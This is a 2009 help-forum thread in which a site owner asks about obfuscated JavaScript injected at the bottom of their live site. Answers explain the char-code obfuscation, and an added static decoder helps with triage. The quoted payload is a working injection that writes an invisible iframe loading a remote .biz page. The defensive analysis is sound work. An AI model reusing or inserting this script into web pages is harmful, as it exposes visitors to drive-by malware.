Solved

Javascript Added to bottom of site - Virus

Posted on 2009-05-05
Last Modified: 2013-12-09
Hi All,

Hoping someone can answer this. The following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there? Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Question by:jimbinho
8 Comments
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304108
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

0
 

Author Comment

by:jimbinho
ID: 24304137
Hi,

Thanks for this. I think, to be more specific, what I am looking for is what the code does when unscrambled, as I am assuming it is scrambled JavaScript. I would also like to know how anyone would do this, and if anyone has seen anything like this before, can they shed any light?

Thanks
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304167
Here is what it translates as...
iframeCode.jpg
0

 
LVL 41

Expert Comment

by:HonorGod
ID: 24305101
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>
<body>
 
<script type="text/javascript">
 
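// Print each character of the string next to its numeric character code
var str = '<iframe width="480"';
for ( var i = 0; i < str.length; i++ ) {
  // charAt() also works in older browsers where str[ i ] is undefined
  document.write( str.charAt( i ) + ' = ' + str.charCodeAt( i ) + '<br />' );
}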
</script>
 
</body>
</html>


0
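
Added example, not code from the thread: the decoding described in the comments above, done statically in JavaScript (Node.js) so the injected script is treated as data and never executed. The function names, the `Zq` delimiter, the `example.invalid` host and the hidden-iframe heuristics are assumptions made for this example, and the sample page is constructed.

```javascript
// Static triage of a page that has script appended after </html>.
// Nothing from the page is executed; the blob is decoded as data only.

// Return whatever the server sent after the last closing </html> tag.
function trailingContent(page) {
  const idx = page.toLowerCase().lastIndexOf("</html>");
  return idx === -1 ? "" : page.slice(idx + "</html>".length).trim();
}

// Find  var X = "<blob>" ... X.split("<delim>")  and decode the char codes.
function decodeCharCodeBlob(script) {
  const split = /(\w+)\s*\.\s*split\(\s*"([^"]+)"\s*\)/.exec(script);
  if (!split) return null;
  const [, name, delim] = split;
  const decl = new RegExp("var\\s+" + name + "\\s*=\\s*\"([^\"]*)\"").exec(script);
  if (!decl) return null;
  const codes = decl[1].split(delim).slice(1); // index 0 is the empty prefix
  if (!codes.every((c) => /^\d{1,5}$/.test(c))) return null;
  return codes.map((c) => String.fromCharCode(Number(c))).join("");
}

// Report what the decoded markup would load and whether it is styled to hide.
// The two style checks are assumed heuristics, not a complete rule set.
function triage(page) {
  const tail = trailingContent(page);
  const decoded = decodeCharCodeBlob(tail);
  if (decoded === null) return { tail, decoded: null, src: null, hidden: false };
  const src = /<iframe[^>]*\ssrc\s*=\s*"([^"]*)"/i.exec(decoded);
  const hidden = /opacity\s*:\s*0(?![.\d])|left\s*:\s*-\d+px/i.test(decoded);
  return { tail, decoded, src: src ? src[1] : null, hidden };
}

// Constructed sample (not the page's payload): benign iframe, placeholder host.
const SAMPLE_HTML =
  '<iframe src="http://example.invalid/feed.html" style="left:-500px; opacity:0"></iframe>';
const SAMPLE_BLOB = Array.from(SAMPLE_HTML, (c) => "Zq" + c.charCodeAt(0)).join("");
const SAMPLE_PAGE =
  "<html><body>ok</body></html>" +
  '<script>var a = "' + SAMPLE_BLOB + '";var b = a.split("Zq");var c = "";' +
  "for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}document.write(c)</script>";

console.log(triage(SAMPLE_PAGE));
```

Running `triage()` over the copy the server actually returns, rather than the local source files, matters here because the asker reports the script exists only on the remote.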
 

Author Comment

by:jimbinho
ID: 24306426
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 1500 total points
ID: 24306495
Ah, now that's a real question.

There are a number of possibilities.  Unfortunately, I don't know for certain, especially without knowing specifics about the server on which this code was found, or who has access to it, or the kind of programs that execute on it, etc.
0
 

Author Closing Comment

by:jimbinho
ID: 31577958
Appreciate the help
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24421987
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
0

Question has a verified solution.